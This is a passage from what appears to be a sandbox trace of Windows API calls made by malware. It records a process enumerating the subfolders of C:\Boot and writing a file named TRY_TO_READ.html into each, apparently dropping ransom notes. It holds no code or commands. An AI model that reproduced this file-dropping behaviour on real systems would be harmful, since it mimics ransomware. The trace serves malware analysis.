	[0051.850] WriteFile (in: hFile=0x3c4, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0051.851] WriteFile (in: hFile=0x3c4, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0051.851] WriteFile (in: hFile=0x3c4, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0051.851] CloseHandle (hObject=0x3c4) returned 1
	[0051.851] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0051.851] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596570 | out: hHeap=0x540000) returned 1
	[0051.851] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596560 | out: hHeap=0x540000) returned 1
	[0051.851] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5350 | out: hHeap=0x540000) returned 1
	[0051.851] FindNextFileW (in: hFindFile=0x574de0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1
	[0051.851] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.851] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.851] GetLastError () returned 0x0
	[0051.851] SetLastError (dwErrCode=0x0) 
	[0051.851] GetLastError () returned 0x0
	[0051.851] SetLastError (dwErrCode=0x0) 
	[0051.851] GetLastError () returned 0x0
	[0051.851] SetLastError (dwErrCode=0x0) 
	[0051.851] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5350
	[0051.851] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5378
	[0051.851] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a53a0
	[0051.851] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596560
	[0051.851] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596570
	[0051.852] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0051.852] GetLastError () returned 0x0
	[0051.852] SetLastError (dwErrCode=0x0) 
	[0051.852] GetLastError () returned 0x0
	[0051.852] SetLastError (dwErrCode=0x0) 
	[0051.852] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584780
	[0051.852] CreateFileW (lpFileName="C:\\\\Boot\\es-ES\\TRY_TO_READ.html" (normalized: "c:\\boot\\es-es\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3c4
	[0051.853] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584780 | out: hHeap=0x540000) returned 1
	[0051.853] WriteFile (in: hFile=0x3c4, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0051.853] WriteFile (in: hFile=0x3c4, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0051.854] WriteFile (in: hFile=0x3c4, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0051.854] CloseHandle (hObject=0x3c4) returned 1
	[0051.854] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0051.854] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596570 | out: hHeap=0x540000) returned 1
	[0051.854] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596560 | out: hHeap=0x540000) returned 1
	[0051.854] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a53a0 | out: hHeap=0x540000) returned 1
	[0051.854] FindNextFileW (in: hFindFile=0x574de0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1
	[0051.854] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.854] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.854] GetLastError () returned 0x0
	[0051.854] SetLastError (dwErrCode=0x0) 
	[0051.854] GetLastError () returned 0x0
	[0051.854] SetLastError (dwErrCode=0x0) 
	[0051.854] GetLastError () returned 0x0
	[0051.854] SetLastError (dwErrCode=0x0) 
	[0051.854] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a53a0
	[0051.854] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a53c8
	[0051.854] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a53f0
	[0051.854] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596560
	[0051.854] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596570
	[0051.854] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0051.854] GetLastError () returned 0x0
	[0051.855] SetLastError (dwErrCode=0x0) 
	[0051.855] GetLastError () returned 0x0
	[0051.855] SetLastError (dwErrCode=0x0) 
	[0051.855] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584780
	[0051.855] CreateFileW (lpFileName="C:\\\\Boot\\fi-FI\\TRY_TO_READ.html" (normalized: "c:\\boot\\fi-fi\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3c4
	[0051.855] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584780 | out: hHeap=0x540000) returned 1
	[0051.855] WriteFile (in: hFile=0x3c4, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0051.856] WriteFile (in: hFile=0x3c4, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0051.856] WriteFile (in: hFile=0x3c4, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0051.856] CloseHandle (hObject=0x3c4) returned 1
	[0051.856] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0051.856] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596570 | out: hHeap=0x540000) returned 1
	[0051.856] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596560 | out: hHeap=0x540000) returned 1
	[0051.856] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a53f0 | out: hHeap=0x540000) returned 1
	[0051.856] FindNextFileW (in: hFindFile=0x574de0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Fonts", cAlternateFileName="")) returned 1
	[0051.856] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.856] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.856] GetLastError () returned 0x0
	[0051.856] SetLastError (dwErrCode=0x0) 
	[0051.856] GetLastError () returned 0x0
	[0051.856] SetLastError (dwErrCode=0x0) 
	[0051.856] GetLastError () returned 0x0
	[0051.856] SetLastError (dwErrCode=0x0) 
	[0051.857] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a53f0
	[0051.857] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5418
	[0051.857] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5440
	[0051.857] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596560
	[0051.857] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596570
	[0051.857] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0051.857] GetLastError () returned 0x0
	[0051.857] SetLastError (dwErrCode=0x0) 
	[0051.857] GetLastError () returned 0x0
	[0051.857] SetLastError (dwErrCode=0x0) 
	[0051.857] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584780
	[0051.857] CreateFileW (lpFileName="C:\\\\Boot\\Fonts\\TRY_TO_READ.html" (normalized: "c:\\boot\\fonts\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3c4
	[0051.859] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584780 | out: hHeap=0x540000) returned 1
	[0051.859] WriteFile (in: hFile=0x3c4, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0051.860] WriteFile (in: hFile=0x3c4, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0051.860] WriteFile (in: hFile=0x3c4, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0051.860] CloseHandle (hObject=0x3c4) returned 1
	[0051.860] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0051.860] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596570 | out: hHeap=0x540000) returned 1
	[0051.860] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596560 | out: hHeap=0x540000) returned 1
	[0051.860] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5440 | out: hHeap=0x540000) returned 1
	[0051.860] FindNextFileW (in: hFindFile=0x574de0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1
	[0051.860] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.860] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.860] GetLastError () returned 0x0
	[0051.860] SetLastError (dwErrCode=0x0) 
	[0051.860] GetLastError () returned 0x0
	[0051.860] SetLastError (dwErrCode=0x0) 
	[0051.860] GetLastError () returned 0x0
	[0051.860] SetLastError (dwErrCode=0x0) 
	[0051.860] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5440
	[0051.860] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5468
	[0051.860] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5490
	[0051.861] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596560
	[0051.861] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596570
	[0051.861] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0051.861] GetLastError () returned 0x0
	[0051.861] SetLastError (dwErrCode=0x0) 
	[0051.861] GetLastError () returned 0x0
	[0051.861] SetLastError (dwErrCode=0x0) 
	[0051.861] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584780
	[0051.861] CreateFileW (lpFileName="C:\\\\Boot\\fr-FR\\TRY_TO_READ.html" (normalized: "c:\\boot\\fr-fr\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3c4
	[0051.862] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584780 | out: hHeap=0x540000) returned 1
	[0051.862] WriteFile (in: hFile=0x3c4, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0051.863] WriteFile (in: hFile=0x3c4, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0051.863] WriteFile (in: hFile=0x3c4, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0051.863] CloseHandle (hObject=0x3c4) returned 1
	[0051.863] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0051.863] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596570 | out: hHeap=0x540000) returned 1
	[0051.863] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596560 | out: hHeap=0x540000) returned 1
	[0051.863] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5490 | out: hHeap=0x540000) returned 1
	[0051.863] FindNextFileW (in: hFindFile=0x574de0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1
	[0051.863] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.863] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.863] GetLastError () returned 0x0
	[0051.863] SetLastError (dwErrCode=0x0) 
	[0051.863] GetLastError () returned 0x0
	[0051.863] SetLastError (dwErrCode=0x0) 
	[0051.863] GetLastError () returned 0x0
	[0051.863] SetLastError (dwErrCode=0x0) 
	[0051.863] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5490
	[0051.863] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a54b8
	[0051.863] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a54e0
	[0051.863] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596560
	[0051.863] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596570
	[0051.864] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0051.864] GetLastError () returned 0x0
	[0051.864] SetLastError (dwErrCode=0x0) 
	[0051.864] GetLastError () returned 0x0
	[0051.864] SetLastError (dwErrCode=0x0) 
	[0051.864] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584780
	[0051.864] CreateFileW (lpFileName="C:\\\\Boot\\hu-HU\\TRY_TO_READ.html" (normalized: "c:\\boot\\hu-hu\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3c4
	[0051.864] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584780 | out: hHeap=0x540000) returned 1
	[0051.864] WriteFile (in: hFile=0x3c4, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0051.865] WriteFile (in: hFile=0x3c4, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0051.865] WriteFile (in: hFile=0x3c4, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0051.865] CloseHandle (hObject=0x3c4) returned 1
	[0051.865] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0051.865] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596570 | out: hHeap=0x540000) returned 1
	[0051.865] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596560 | out: hHeap=0x540000) returned 1
	[0051.865] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a54e0 | out: hHeap=0x540000) returned 1
	[0051.865] FindNextFileW (in: hFindFile=0x574de0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="it-IT", cAlternateFileName="")) returned 1
	[0051.865] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.865] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.865] GetLastError () returned 0x0
	[0051.865] SetLastError (dwErrCode=0x0) 
	[0051.866] GetLastError () returned 0x0
	[0051.866] SetLastError (dwErrCode=0x0) 
	[0051.866] GetLastError () returned 0x0
	[0051.866] SetLastError (dwErrCode=0x0) 
	[0051.866] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a54e0
	[0051.866] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5508
	[0051.866] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5530
	[0051.866] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596560
	[0051.866] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596570
	[0051.866] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0051.866] GetLastError () returned 0x0
	[0051.866] SetLastError (dwErrCode=0x0) 
	[0051.866] GetLastError () returned 0x0
	[0051.866] SetLastError (dwErrCode=0x0) 
	[0051.866] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584780
	[0051.866] CreateFileW (lpFileName="C:\\\\Boot\\it-IT\\TRY_TO_READ.html" (normalized: "c:\\boot\\it-it\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3c4
	[0051.867] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584780 | out: hHeap=0x540000) returned 1
	[0051.867] WriteFile (in: hFile=0x3c4, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0051.868] WriteFile (in: hFile=0x3c4, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0051.868] WriteFile (in: hFile=0x3c4, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0051.868] CloseHandle (hObject=0x3c4) returned 1
	[0051.868] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0051.868] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596570 | out: hHeap=0x540000) returned 1
	[0051.868] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596560 | out: hHeap=0x540000) returned 1
	[0051.868] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5530 | out: hHeap=0x540000) returned 1
	[0051.868] FindNextFileW (in: hFindFile=0x574de0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1
	[0051.868] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.868] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.868] GetLastError () returned 0x0
	[0051.869] SetLastError (dwErrCode=0x0) 
	[0051.869] GetLastError () returned 0x0
	[0051.869] SetLastError (dwErrCode=0x0) 
	[0051.869] GetLastError () returned 0x0
	[0051.869] SetLastError (dwErrCode=0x0) 
	[0051.869] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5530
	[0051.869] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5558
	[0051.869] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5580
	[0051.869] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596560
	[0051.869] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596570
	[0051.869] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0051.869] GetLastError () returned 0x0
	[0051.869] SetLastError (dwErrCode=0x0) 
	[0051.869] GetLastError () returned 0x0
	[0051.869] SetLastError (dwErrCode=0x0) 
	[0051.869] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584780
	[0051.869] CreateFileW (lpFileName="C:\\\\Boot\\ja-JP\\TRY_TO_READ.html" (normalized: "c:\\boot\\ja-jp\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3c4
	[0051.869] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584780 | out: hHeap=0x540000) returned 1
	[0051.870] WriteFile (in: hFile=0x3c4, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0051.870] WriteFile (in: hFile=0x3c4, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0051.870] WriteFile (in: hFile=0x3c4, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0051.870] CloseHandle (hObject=0x3c4) returned 1
	[0051.871] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0051.871] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596570 | out: hHeap=0x540000) returned 1
	[0051.871] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596560 | out: hHeap=0x540000) returned 1
